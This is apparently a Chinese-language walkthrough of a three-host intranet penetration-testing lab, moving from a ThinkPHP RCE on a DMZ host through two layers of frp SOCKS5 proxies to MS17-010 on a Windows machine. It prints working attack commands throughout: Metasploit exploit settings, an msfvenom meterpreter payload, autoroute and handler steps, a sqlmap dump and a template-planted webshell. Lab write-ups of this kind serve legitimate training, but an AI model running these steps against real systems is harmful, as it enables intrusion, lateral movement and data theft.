搭建

1
链接: https://pan.baidu.com/s/15wGipVtP7thSCntm1aSEKw?pwd=pikv 提取码: pikv

介绍

这个靶场俺没得来源,是用来学习内网渗透用的。比较简陋的一个靶场

共有三台主机

PC1: centos 192.168.198.134

PC2: ubuntu 192.168.22.22

PC3: windows 192.168.33.33

网络拓扑

image.png

本文涉及代理及多层代理,仅仅添加了配置,没有做详细的解释。

攻击DMZ获取控制权

访问该站点,发现是php站点,使用漏扫进行扫描

1
./nuclei -target http://192.168.122.88

image.png

进行漏洞利用

1
2
3
4
5
6
use exploit/unix/webapp/thinkphp_rce
set RHOSTS 192.168.122.88
set RPORT 80
set SRVPORT 4466
set LHOST 192.168.2.183
run

成功getshell

image.png

做了一半换重新整靶场了,DMZ主机的ip为192.168.198.134

DMZ信息收集

查看当前网卡信息,发现一个其他可通网段,尝试对网段进行扫描

image.png

在dmz中上传fscan,进行扫描

image.png

收集到ip192.168.22.22

进行端口转发,尝试寻找漏洞

这个不行,原因是ubuntu站点对访问域名有限制

1
portfwd add -l <local_port> -p <remote_port> -r <remote_host>

尝试使用frp进行端口转发,让dmz做代理

dmz客户端配置

1
2
3
4
5
6
7
8
serverAddr = "192.168.198.134"
serverPort = 4909
[[proxies]]
name = "asdfdsafwwwwhttp_proxy"
type = "tcp"
remotePort = 11087
[proxies.plugin]
type = "socks5"

对ubuntu进行漏洞扫描&漏洞利用

访问站点

image.png

看看f12

image.png

直接告诉我了,开干

image.png

sqlmap一把梭哈,直接dump

image.png

发现了密码,但没什么用

image.png{:height 88, :width 656}

尝试目录扫描

image.png

扫描结果:

image.png

访问半天发现了robots.txt

image.png

竟然有后台,登陆一下

image.png

image.png{:height 516, :width 749}

按照网上的教程,设置模板,在模板中整一个一句话木马

image.png

用蚁剑连接

image.png

我们上传一个大马

生成大马

msfvenom -p linux/x64/meterpreter/bind_tcp -f elf RHOST=192.168.22.22 LPORT=8871 -o bigma.elf

开启监听

将第一步dmz的主机作路由

run autoroute -s 192.168.22.0/24

开启handler

handler -p linux/x64/meterpreter/bind_tcp -H 192.168.22.22 -P 8871

image.png

ubuntu信息收集

同样的配方,这里不展示了

image.png

配置frp服务器

1
2
3
4
5
6
7
8
9
10
11
12
13
14
serverAddr = "192.168.198.134"
serverPort = 4909
[[proxies]]
name = "asdfdsafwwwwhttp_proxy"
type = "tcp"
remotePort = 11087
[proxies.plugin]
type = "socks5"
[[proxies]]
name = "asdfdsafps"
type = "tcp"
localIP = "127.0.0.1"
localPort = 11086
remotePort = 11086

配置frp客户端

1
2
3
4
5
6
7
8
serverAddr = "192.168.22.11"
serverPort = 4909
[[proxies]]
name = "asdfdsafwwwwhttp_proxy"
type = "tcp"
remotePort = 11086
[proxies.plugin]
type = "socks5"

获得机器192.168.33.33,一眼windows。

对windows进行漏洞扫描&利用

配置代理

不做展示

漏洞扫描&漏洞利用

直接ms17-010

总结

image.png

一共三台机器,需搭建两层代理。